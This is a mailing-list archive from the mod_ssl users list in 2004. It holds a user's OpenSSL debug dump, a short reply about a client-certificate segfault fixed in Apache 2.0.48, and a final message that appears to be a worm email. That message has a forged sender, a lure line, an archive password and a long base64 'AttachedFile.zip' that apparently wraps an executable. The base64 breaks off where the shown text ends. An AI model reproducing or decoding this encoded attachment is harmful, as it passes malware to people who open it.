[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: e5 4f 93 d4 e8 8d 9b f0-c1 e6 61 90 b1 0e 3b cf  .O........a...;. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: 39 67 3c 53 1e b6 0c 91-15 06 bf d0 29 06 38 26  9g......D |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04a0: 54 d9 06 4a 05 6c 06 ec-2b cc 4e d3 1d b6 9f a7  T..J.l..+.N..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04b0: e3 a2 60 35 2d 6c ce 95-92 bc 25 bc e9 ee 99 ba  ..`5-l....%..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04c0: 0f 6a b5 ad 64 9a 09 52-5f 23 8e 1e 2c 31 62 92  .j..d..R_#..,1b. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04d0: 90 99 f9 20 db 41 92 d7-b7 11 cd eb 56 ab b9 11  ... .A......V... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04e0: c1 e5 09 ef 64 08 df df-47 a0 05 03 07 7e e6 e8  ....d...G....~.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04f0: 0e fc 41 19 61 d4 0a 57-1d 84 dd a8 79 f1 54 10  ..A.a..W....y.T. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0500: 00 00 80 49 5c 9a ec ae-3a fa 71 0f 87 6d fb 01  ...I\...:.q..m.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0510: 8f a8 e2 76 2c 5d 54 77-e9 48 90 51 82 19 08 86  ...v,]Tw.H.Q.... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0520: 72 db a0 7c 2c 1c 6d f1-b8 03 e3 1f 27 6d e1 06  r..|,.m.....'m.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0530: 64 2d 60 03 08 9a 5f 9e-e9 5d da f2 f3 5b e3 0f  d-`..._..]...[.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0540: 3d f1 39 ce da 4b 5b 6a-ef bc ae c2 0b 21 54 3c  =.9..K[j.....!T< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0550: f3 44 a8 94 bb b8 32 a8-a7 49 d0 95 2a 3e fe 12  .D....2..I..*>.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0560: a5 95 67 33 12 63 58 21-93 b8 e4 ba c0 bb ee 67  ..g3.cX!.......g |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0570: 43 88 fd 86 21 e6 3f 49-03 6f e4 e7 d4 60 f3 ab  C...!.?I.o...`.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0580: 34 54 8d 0f 00 00 82 00-80 10 88 35 cf 21 45 57  4T.........5.!EW |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0590: 5e 52 90 d2 78 0e f5 d3-a1 5d ce 07 f9 8f 61 d1  ^R..x....]....a. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 05a0: 61 79 8c c5 c9 c9 d6 98-26 b6 8e c3 97 66 7e     ay......&....f~  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 90/90 bytes from BIO#82e1738 [mem: 82d2ae4] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 2f 0a 4d 27 70 47 75 ec-38 49 23 30 d0 22 f3 71  /.M'pGu.8I#0.".q |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 88 3c ab 61 21 3d 94 95-08 1f 0d 12 6a 09 15 2a  .<.a!=......j..* |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 3a 46 f6 e4 6b 12 e0 5b-e3 a2 1c 11 78 aa 38 f9  :F..k..[....x.8. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 05 7f e6 cb 4d 8f 42 73-77 5b a7 f3 17 dd 15 cb  ....M.Bsw[...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: ba ef cd 90 3a 0e 9c 65-c8 93 61 5c a1 f4 d8 c3  ....:..e..a\.... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0050: 65 99 20 6f 03 6d 5d 5a-b0 cc                    e. o.m]Z..       |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+


	



==========================================================-
Bu e-posta sadece yukarida isimleri belirtilen kisiler arasinda özel haberlesme amacini tasimaktadir. Size yanlislikla ulasmissa lütfen gönderen kisiyi bilgilendiriniz ve mesaji sisteminizden siliniz. Turkiye Cumhuriyet Merkez Bankasi A.S. bu mesajin icerigi ile ilgili olarak hicbir hukuksal sorumlulugu kabul etmez. 

This e-mail communication is intended for the private use of the people named above. If you received this message in error, please immediately notify the sender and delete it from your system. The Central Bank of The Republic of Turkey does not accept legal responsibility for the contents of this message.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 13:18:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5A53DA8AA3; Thu,  4 Mar 2004 13:18:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id B54C9A8944
	for ; Thu,  4 Mar 2004 13:18:14 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.11.6/8.11.6) with ESMTP id i24CICb08056
	for ; Thu, 4 Mar 2004 07:18:12 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i24CIB808316
	for ; Thu, 4 Mar 2004 07:18:11 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i24CIBUr021728
	for ; Thu, 4 Mar 2004 12:18:11 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i24CIAHL021727
	for modssl-users@modssl.org; Thu, 4 Mar 2004 12:18:10 GMT
Date: Thu, 4 Mar 2004 12:18:10 +0000
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: problem with SSLVerifyClient required in apache 2.0
Message-ID: <20040304121810.GA21470@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <00BAC1E9C896D411A46100508B137C3C0C74D5FD@idmsmail1.tcmb.gov.tr>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <00BAC1E9C896D411A46100508B137C3C0C74D5FD@idmsmail1.tcmb.gov.tr>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Mar 04, 2004 at 02:06:53PM +0200, Mahmut Eren wrote:
> Hi,
> My system configuration is as follows:
> Mandrake 9.2
> Apache 2.0.47 
> apache2-mod_ssl 2.0.47 
> OpenSSL 0.9.7b 
...
> If I turn off the SSLVerifyClient parameter everything works fine. But 
> when I turn on SSLVerifyClient as "SSLVerifyClient require" , the client (IE,mozilla) can not connect to server.
> and apache logs the following for every attempt: 
>    [Wed Mar 03 12:57:37 2004] [notice] child pid 22462 exit signal Segmentation fault (11)
> I made the log level debug and get the following lines in ssl-error log file. Any help will be appreciated. 

There were fixes for this in 2.0.48, but I think it only segfaults on a
client cert verification failure (i.e. the client is sending a cert
which is not signed by one of the configured CA certs).

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 14:58:37 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 599ADA89B8; Thu,  4 Mar 2004 14:58:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from studenten-pc-5 (studenten-pc-5-classroom.geo.uni-bremen.de [134.102.241.65])
	by master.modssl.org (Postfix) with SMTP id C0BD9A898B
	for ; Thu,  4 Mar 2004 14:58:24 +0100 (CET)
Date: Thu, 04 Mar 2004 14:58:21 +0100
To: modssl-users@modssl.org
Subject: ello! =))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jlwulgaquksmstektpad"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jlwulgaquksmstektpad
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 I don't bite, weah!
 
83683 -- archive  password

----------jlwulgaquksmstektpad
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
